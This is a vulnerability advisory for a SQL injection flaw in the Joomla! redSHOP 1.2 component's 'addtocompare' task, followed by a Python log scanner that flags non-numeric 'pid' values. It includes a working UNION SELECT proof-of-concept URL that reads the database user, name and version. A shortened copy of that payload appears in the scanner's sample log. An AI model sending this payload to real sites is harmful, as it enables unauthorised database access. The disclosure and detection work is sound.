--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------

== Overview ==

- Affected product: Joomla! redSHOP component
- Download URL: http://redcomponent.com/redcomponent/redshop
- Developer: redcomponent
- Affected versions: 1.2 is affected; other versions may be affected as well
- Discovered by: Matias Fontanini

== Vulnerability ==

When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks.

The following proof of concept request retrieves the database user, name and version:

http://www.2cto.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422

== Solution ==

Upgrade to version 1.3.
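
A defender-side check for the flaw described above, as an added example that is not part of the original advisory: it scans web server access logs for "addtocompare" requests whose "pid" is not a plain integer. The combined log format, the function names and the sample log lines (the second one shortened from the advisory's request) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_pid(target):
    """Return the decoded pid if the request hits redSHOP's addtocompare
    task with a non-numeric pid, otherwise None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_redshop" not in query.get("option", []):
        return None
    if "addtocompare" not in query.get("task", []):
        return None
    for pid in query.get("pid", []):
        # A product id is an integer; anything else did not come from the shop UI.
        if not re.fullmatch(r"\d+", pid):
            return pid
    return None

def scan(lines):
    """Return (client_ip, decoded pid) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        pid = suspicious_pid(m.group("target"))
        if pid is not None:
            hits.append((line.split(" ", 1)[0], pid))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24&cmd=add&cid=20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3%23&cmd=add&cid=20 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2012:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, pid in scan(SAMPLE_LOG):
        print(f"{ip}: non-numeric pid {pid!r}")
```

The same integer-only rule, applied to "pid" before the request reaches the component, works as a stopgap filter on sites that cannot upgrade to 1.3 immediately.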